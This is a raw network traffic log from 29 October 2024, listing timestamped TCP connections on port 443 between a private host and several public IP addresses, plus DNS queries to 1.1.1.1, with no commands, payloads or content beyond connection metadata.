                                                                          Oct 29, 2024 16:51:43.451067924 CET44349280104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.451212883 CET44349280104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.451265097 CET49280443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:43.451280117 CET44349280104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.451376915 CET44349280104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.451426029 CET49280443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:43.451433897 CET44349280104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.472359896 CET44349282104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.472420931 CET44349282104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.472459078 CET44349282104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.472498894 CET49282443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:43.472503901 CET44349282104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.472517967 CET44349282104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.472549915 CET49282443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:43.472589970 CET44349282104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.472647905 CET49282443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:43.472654104 CET44349282104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.472872019 CET44349282104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.472910881 CET44349282104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.472919941 CET49282443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:43.472924948 CET44349282104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.472964048 CET49282443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:43.472968102 CET44349282104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.491169930 CET44349280104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.491205931 CET44349280104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.491276979 CET49280443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:43.491287947 CET44349280104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.491338968 CET49280443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:43.520103931 CET49282443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:43.573834896 CET44349280104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.573899031 CET44349280104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.573921919 CET44349280104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.574031115 CET49280443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:43.574044943 CET44349280104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.574174881 CET49280443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:43.574177027 CET44349280104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.574193001 CET44349280104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.574297905 CET49280443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:43.574305058 CET44349280104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.589073896 CET44349282104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.589201927 CET44349282104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.589243889 CET44349282104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.589263916 CET49282443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:43.589270115 CET44349282104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.589358091 CET44349282104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.589385033 CET49282443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:43.589390993 CET44349282104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.589433908 CET49282443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:43.590208054 CET44349282104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.590651989 CET44349282104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.590681076 CET44349282104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.590714931 CET49282443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:43.590720892 CET44349282104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.590765953 CET49282443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:43.614535093 CET44349280104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.614584923 CET44349280104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.614645004 CET49280443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:43.614671946 CET44349280104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.614731073 CET49280443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:43.697530985 CET44349280104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.697545052 CET44349280104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.697587967 CET44349280104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.697633028 CET44349280104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.697730064 CET49280443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:43.697748899 CET44349280104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.697884083 CET49280443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:43.706101894 CET44349282104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.706434965 CET44349282104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.706515074 CET49282443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:43.706523895 CET44349282104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.706597090 CET44349282104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.706639051 CET44349282104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.706685066 CET49282443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:43.706690073 CET44349282104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.706732988 CET49282443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:43.706912994 CET44349282104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.706990957 CET44349282104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.707040071 CET49282443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:43.707046032 CET44349282104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.707707882 CET44349282104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.707757950 CET44349282104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.707760096 CET49282443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:43.707772017 CET44349282104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.707813025 CET49282443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:43.737935066 CET44349280104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.738060951 CET49280443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:43.738172054 CET44349280104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.738249063 CET49280443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:43.820780039 CET44349280104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.820907116 CET49280443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:43.820954084 CET44349280104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.821022034 CET49280443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:43.822932959 CET44349282104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.823096991 CET44349282104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.823153973 CET49282443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:43.823158026 CET44349282104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.823173046 CET44349282104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.823231936 CET49282443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:43.823239088 CET44349282104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.823671103 CET44349282104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.823733091 CET49282443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:43.823738098 CET44349282104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.823786974 CET44349282104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.823834896 CET49282443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:43.823841095 CET44349282104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.861346006 CET44349280104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.861459017 CET49280443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:43.861649990 CET44349280104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.861716986 CET49280443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:43.864290953 CET49282443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:43.939704895 CET44349282104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.939752102 CET44349282104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.939799070 CET44349282104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.939853907 CET49282443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:43.939867973 CET44349282104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.939892054 CET49282443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:43.940558910 CET44349282104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.940619946 CET49282443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:43.940625906 CET44349282104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.940671921 CET49282443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:43.941123962 CET44349282104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.941181898 CET49282443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:43.944483042 CET44349280104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.944592953 CET49280443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:43.944612026 CET44349280104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.944669962 CET49280443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:43.984632015 CET44349280104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.984806061 CET49280443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:43.984939098 CET44349280104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.985047102 CET49280443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:43.985061884 CET44349280104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:43.985138893 CET49280443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:44.056663036 CET44349282104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:44.056754112 CET44349282104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:44.056770086 CET49282443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:44.056809902 CET44349282104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:44.056827068 CET49282443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:44.056852102 CET49282443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:44.056982994 CET44349282104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:44.057035923 CET49282443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:44.057737112 CET44349282104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:44.057794094 CET49282443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:44.067558050 CET44349280104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:44.067635059 CET49280443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:44.107808113 CET44349280104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:44.107865095 CET44349280104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:44.107892036 CET49280443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:44.107902050 CET44349280104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:44.107934952 CET49280443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:44.108202934 CET44349280104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:44.108246088 CET44349280104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:44.108249903 CET49280443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:44.108258963 CET44349280104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:44.108294010 CET49280443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:44.150274038 CET49280443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:44.197072029 CET44349282104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:44.197158098 CET44349282104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:44.197180033 CET49282443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:44.197189093 CET44349282104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:44.197241068 CET49282443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:44.197328091 CET44349282104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:44.197375059 CET49282443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:44.197451115 CET44349282104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:44.197494984 CET49282443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:44.198072910 CET44349280104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:44.198132992 CET49280443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:44.198618889 CET44349282104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:44.198695898 CET49282443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:44.231004953 CET44349280104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:44.231071949 CET44349280104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:44.231084108 CET49280443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:44.231108904 CET44349280104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:44.231126070 CET49280443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:44.231415987 CET44349280104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:44.231461048 CET49280443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:44.231471062 CET44349280104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:44.231508017 CET49280443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:44.292270899 CET44349282104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:44.292320967 CET44349282104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:44.292387009 CET49282443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:44.292402029 CET44349282104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:44.292424917 CET44349282104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:44.292439938 CET49282443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:44.292459965 CET49282443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:44.293932915 CET49282443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:44.293950081 CET44349282104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:44.321661949 CET44349280104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:44.321772099 CET49280443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:44.321810961 CET44349280104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:44.321862936 CET49280443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:44.321871042 CET44349280104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:44.321929932 CET44349280104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:44.321974039 CET49280443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:44.323930979 CET49280443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:51:44.323945045 CET44349280104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:51:47.465431929 CET49283443192.168.2.16142.250.185.100
                                                                          Oct 29, 2024 16:51:47.465476036 CET44349283142.250.185.100192.168.2.16
                                                                          Oct 29, 2024 16:51:47.465573072 CET49283443192.168.2.16142.250.185.100
                                                                          Oct 29, 2024 16:51:47.465806007 CET49283443192.168.2.16142.250.185.100
                                                                          Oct 29, 2024 16:51:47.465823889 CET44349283142.250.185.100192.168.2.16
                                                                          Oct 29, 2024 16:51:48.332425117 CET44349283142.250.185.100192.168.2.16
                                                                          Oct 29, 2024 16:51:48.332812071 CET49283443192.168.2.16142.250.185.100
                                                                          Oct 29, 2024 16:51:48.332829952 CET44349283142.250.185.100192.168.2.16
                                                                          Oct 29, 2024 16:51:48.333240986 CET44349283142.250.185.100192.168.2.16
                                                                          Oct 29, 2024 16:51:48.333672047 CET49283443192.168.2.16142.250.185.100
                                                                          Oct 29, 2024 16:51:48.333733082 CET44349283142.250.185.100192.168.2.16
                                                                          Oct 29, 2024 16:51:48.381293058 CET49283443192.168.2.16142.250.185.100
                                                                          Oct 29, 2024 16:51:58.327368021 CET44349283142.250.185.100192.168.2.16
                                                                          Oct 29, 2024 16:51:58.327461004 CET44349283142.250.185.100192.168.2.16
                                                                          Oct 29, 2024 16:51:58.327541113 CET49283443192.168.2.16142.250.185.100
                                                                          Oct 29, 2024 16:51:58.363010883 CET49283443192.168.2.16142.250.185.100
                                                                          Oct 29, 2024 16:51:58.363033056 CET44349283142.250.185.100192.168.2.16
                                                                          Oct 29, 2024 16:51:58.363305092 CET49284443192.168.2.16188.114.96.3
                                                                          Oct 29, 2024 16:51:58.363337040 CET44349284188.114.96.3192.168.2.16
                                                                          Oct 29, 2024 16:51:58.363415956 CET49284443192.168.2.16188.114.96.3
                                                                          Oct 29, 2024 16:51:58.363619089 CET49284443192.168.2.16188.114.96.3
                                                                          Oct 29, 2024 16:51:58.363641977 CET44349284188.114.96.3192.168.2.16
                                                                          Oct 29, 2024 16:51:58.559679985 CET49285443192.168.2.16188.114.96.3
                                                                          Oct 29, 2024 16:51:58.559714079 CET44349285188.114.96.3192.168.2.16
                                                                          Oct 29, 2024 16:51:58.559827089 CET49285443192.168.2.16188.114.96.3
                                                                          Oct 29, 2024 16:51:58.560132980 CET49285443192.168.2.16188.114.96.3
                                                                          Oct 29, 2024 16:51:58.560151100 CET44349285188.114.96.3192.168.2.16
                                                                          Oct 29, 2024 16:51:58.983696938 CET44349284188.114.96.3192.168.2.16
                                                                          Oct 29, 2024 16:51:58.983963966 CET49284443192.168.2.16188.114.96.3
                                                                          Oct 29, 2024 16:51:58.983987093 CET44349284188.114.96.3192.168.2.16
                                                                          Oct 29, 2024 16:51:58.985445023 CET44349284188.114.96.3192.168.2.16
                                                                          Oct 29, 2024 16:51:58.985551119 CET49284443192.168.2.16188.114.96.3
                                                                          Oct 29, 2024 16:51:58.985812902 CET49284443192.168.2.16188.114.96.3
                                                                          Oct 29, 2024 16:51:58.985904932 CET44349284188.114.96.3192.168.2.16
                                                                          Oct 29, 2024 16:51:58.985986948 CET49284443192.168.2.16188.114.96.3
                                                                          Oct 29, 2024 16:51:58.985996008 CET44349284188.114.96.3192.168.2.16
                                                                          Oct 29, 2024 16:51:59.031708002 CET49284443192.168.2.16188.114.96.3
                                                                          Oct 29, 2024 16:51:59.201505899 CET44349285188.114.96.3192.168.2.16
                                                                          Oct 29, 2024 16:51:59.201803923 CET49285443192.168.2.16188.114.96.3
                                                                          Oct 29, 2024 16:51:59.201814890 CET44349285188.114.96.3192.168.2.16
                                                                          Oct 29, 2024 16:51:59.202903986 CET44349285188.114.96.3192.168.2.16
                                                                          Oct 29, 2024 16:51:59.203142881 CET49285443192.168.2.16188.114.96.3
                                                                          Oct 29, 2024 16:51:59.203300953 CET49285443192.168.2.16188.114.96.3
                                                                          Oct 29, 2024 16:51:59.203377962 CET44349285188.114.96.3192.168.2.16
                                                                          Oct 29, 2024 16:51:59.255258083 CET49285443192.168.2.16188.114.96.3
                                                                          Oct 29, 2024 16:51:59.255274057 CET44349285188.114.96.3192.168.2.16
                                                                          Oct 29, 2024 16:51:59.303308964 CET49285443192.168.2.16188.114.96.3
                                                                          Oct 29, 2024 16:52:05.521348000 CET49284443192.168.2.16188.114.96.3
                                                                          Oct 29, 2024 16:52:05.521580935 CET44349284188.114.96.3192.168.2.16
                                                                          Oct 29, 2024 16:52:05.521663904 CET49284443192.168.2.16188.114.96.3
                                                                          Oct 29, 2024 16:52:05.525757074 CET49286443192.168.2.16188.114.96.3
                                                                          Oct 29, 2024 16:52:05.525782108 CET44349286188.114.96.3192.168.2.16
                                                                          Oct 29, 2024 16:52:05.525852919 CET49286443192.168.2.16188.114.96.3
                                                                          Oct 29, 2024 16:52:05.526135921 CET49286443192.168.2.16188.114.96.3
                                                                          Oct 29, 2024 16:52:05.526149035 CET44349286188.114.96.3192.168.2.16
                                                                          Oct 29, 2024 16:52:05.527417898 CET49285443192.168.2.16188.114.96.3
                                                                          Oct 29, 2024 16:52:05.575334072 CET44349285188.114.96.3192.168.2.16
                                                                          Oct 29, 2024 16:52:06.145042896 CET44349286188.114.96.3192.168.2.16
                                                                          Oct 29, 2024 16:52:06.145425081 CET49286443192.168.2.16188.114.96.3
                                                                          Oct 29, 2024 16:52:06.145437002 CET44349286188.114.96.3192.168.2.16
                                                                          Oct 29, 2024 16:52:06.146796942 CET44349286188.114.96.3192.168.2.16
                                                                          Oct 29, 2024 16:52:06.147193909 CET49286443192.168.2.16188.114.96.3
                                                                          Oct 29, 2024 16:52:06.147397995 CET44349286188.114.96.3192.168.2.16
                                                                          Oct 29, 2024 16:52:06.201328039 CET49286443192.168.2.16188.114.96.3
                                                                          Oct 29, 2024 16:52:21.015707016 CET44349286188.114.96.3192.168.2.16
                                                                          Oct 29, 2024 16:52:21.015786886 CET44349286188.114.96.3192.168.2.16
                                                                          Oct 29, 2024 16:52:21.015922070 CET49286443192.168.2.16188.114.96.3
                                                                          Oct 29, 2024 16:52:22.816042900 CET49286443192.168.2.16188.114.96.3
                                                                          Oct 29, 2024 16:52:22.816071033 CET44349286188.114.96.3192.168.2.16
                                                                          Oct 29, 2024 16:52:27.024375916 CET49270443192.168.2.16188.114.96.3
                                                                          Oct 29, 2024 16:52:27.024401903 CET44349270188.114.96.3192.168.2.16
                                                                          Oct 29, 2024 16:52:27.405386925 CET49272443192.168.2.16104.17.24.14
                                                                          Oct 29, 2024 16:52:27.405395985 CET44349272104.17.24.14192.168.2.16
                                                                          Oct 29, 2024 16:52:39.939757109 CET44349270188.114.96.3192.168.2.16
                                                                          Oct 29, 2024 16:52:39.939812899 CET44349270188.114.96.3192.168.2.16
                                                                          Oct 29, 2024 16:52:39.939841032 CET44349270188.114.96.3192.168.2.16
                                                                          Oct 29, 2024 16:52:39.939874887 CET44349270188.114.96.3192.168.2.16
                                                                          Oct 29, 2024 16:52:39.939873934 CET49270443192.168.2.16188.114.96.3
                                                                          Oct 29, 2024 16:52:39.939898968 CET44349270188.114.96.3192.168.2.16
                                                                          Oct 29, 2024 16:52:39.939937115 CET44349270188.114.96.3192.168.2.16
                                                                          Oct 29, 2024 16:52:39.939939022 CET49270443192.168.2.16188.114.96.3
                                                                          Oct 29, 2024 16:52:39.939973116 CET44349270188.114.96.3192.168.2.16
                                                                          Oct 29, 2024 16:52:39.939985991 CET49270443192.168.2.16188.114.96.3
                                                                          Oct 29, 2024 16:52:39.939991951 CET44349270188.114.96.3192.168.2.16
                                                                          Oct 29, 2024 16:52:39.940042019 CET49270443192.168.2.16188.114.96.3
                                                                          Oct 29, 2024 16:52:39.940047026 CET44349270188.114.96.3192.168.2.16
                                                                          Oct 29, 2024 16:52:39.940063000 CET44349270188.114.96.3192.168.2.16
                                                                          Oct 29, 2024 16:52:39.940115929 CET49270443192.168.2.16188.114.96.3
                                                                          Oct 29, 2024 16:52:39.941215992 CET49270443192.168.2.16188.114.96.3
                                                                          Oct 29, 2024 16:52:39.941229105 CET44349270188.114.96.3192.168.2.16
                                                                          Oct 29, 2024 16:52:47.516908884 CET49289443192.168.2.16142.250.185.228
                                                                          Oct 29, 2024 16:52:47.516956091 CET44349289142.250.185.228192.168.2.16
                                                                          Oct 29, 2024 16:52:47.517072916 CET49289443192.168.2.16142.250.185.228
                                                                          Oct 29, 2024 16:52:47.517436028 CET49289443192.168.2.16142.250.185.228
                                                                          Oct 29, 2024 16:52:47.517453909 CET44349289142.250.185.228192.168.2.16
                                                                          Oct 29, 2024 16:52:48.422729969 CET44349289142.250.185.228192.168.2.16
                                                                          Oct 29, 2024 16:52:48.465420961 CET49289443192.168.2.16142.250.185.228
                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Oct 29, 2024 16:50:42.542392969 CET53520071.1.1.1192.168.2.16
                                                                          Oct 29, 2024 16:50:42.558708906 CET53653911.1.1.1192.168.2.16
                                                                          Oct 29, 2024 16:50:43.518152952 CET5263853192.168.2.161.1.1.1
                                                                          Oct 29, 2024 16:50:43.518299103 CET6537953192.168.2.161.1.1.1
                                                                          Oct 29, 2024 16:50:43.529512882 CET53526381.1.1.1192.168.2.16
                                                                          Oct 29, 2024 16:50:43.536453009 CET53653791.1.1.1192.168.2.16
                                                                          Oct 29, 2024 16:50:43.829570055 CET53553101.1.1.1192.168.2.16
                                                                          Oct 29, 2024 16:50:44.509875059 CET5620253192.168.2.161.1.1.1
                                                                          Oct 29, 2024 16:50:44.510034084 CET6350553192.168.2.161.1.1.1
                                                                          Oct 29, 2024 16:50:44.741038084 CET53562021.1.1.1192.168.2.16
                                                                          Oct 29, 2024 16:50:44.805452108 CET53635051.1.1.1192.168.2.16
                                                                          Oct 29, 2024 16:50:45.755732059 CET5753353192.168.2.161.1.1.1
                                                                          Oct 29, 2024 16:50:45.755872965 CET5496253192.168.2.161.1.1.1
                                                                          Oct 29, 2024 16:50:45.847058058 CET53549621.1.1.1192.168.2.16
                                                                          Oct 29, 2024 16:50:45.911484957 CET53575331.1.1.1192.168.2.16
                                                                          Oct 29, 2024 16:50:47.391447067 CET5699953192.168.2.161.1.1.1
                                                                          Oct 29, 2024 16:50:47.391609907 CET5179853192.168.2.161.1.1.1
                                                                          Oct 29, 2024 16:50:47.399782896 CET53517981.1.1.1192.168.2.16
                                                                          Oct 29, 2024 16:50:47.400333881 CET53569991.1.1.1192.168.2.16
                                                                          Oct 29, 2024 16:50:47.735846996 CET5748153192.168.2.161.1.1.1
                                                                          Oct 29, 2024 16:50:47.735985994 CET5071653192.168.2.161.1.1.1
                                                                          Oct 29, 2024 16:50:47.736350060 CET5675653192.168.2.161.1.1.1
                                                                          Oct 29, 2024 16:50:47.736479044 CET5809953192.168.2.161.1.1.1
                                                                          Oct 29, 2024 16:50:47.744313955 CET53574811.1.1.1192.168.2.16
                                                                          Oct 29, 2024 16:50:47.744326115 CET53507161.1.1.1192.168.2.16
                                                                          Oct 29, 2024 16:50:47.744535923 CET53567561.1.1.1192.168.2.16
                                                                          Oct 29, 2024 16:50:47.746468067 CET53580991.1.1.1192.168.2.16
                                                                          Oct 29, 2024 16:50:48.966933966 CET6014653192.168.2.161.1.1.1
                                                                          Oct 29, 2024 16:50:48.970081091 CET5493053192.168.2.161.1.1.1
                                                                          Oct 29, 2024 16:50:48.974390030 CET53601461.1.1.1192.168.2.16
                                                                          Oct 29, 2024 16:50:48.978337049 CET53549301.1.1.1192.168.2.16
                                                                          Oct 29, 2024 16:50:49.843085051 CET6076153192.168.2.161.1.1.1
                                                                          Oct 29, 2024 16:50:49.843229055 CET5176353192.168.2.161.1.1.1
                                                                          Oct 29, 2024 16:50:49.851560116 CET53607611.1.1.1192.168.2.16
                                                                          Oct 29, 2024 16:50:49.851876020 CET53517631.1.1.1192.168.2.16
                                                                          Oct 29, 2024 16:50:49.866415977 CET5392953192.168.2.161.1.1.1
                                                                          Oct 29, 2024 16:50:49.866592884 CET5704553192.168.2.161.1.1.1
                                                                          Oct 29, 2024 16:50:49.874258041 CET53570451.1.1.1192.168.2.16
                                                                          Oct 29, 2024 16:50:49.874299049 CET53539291.1.1.1192.168.2.16
                                                                          Oct 29, 2024 16:51:00.824790001 CET53523961.1.1.1192.168.2.16
                                                                          Oct 29, 2024 16:51:02.568537951 CET5252953192.168.2.161.1.1.1
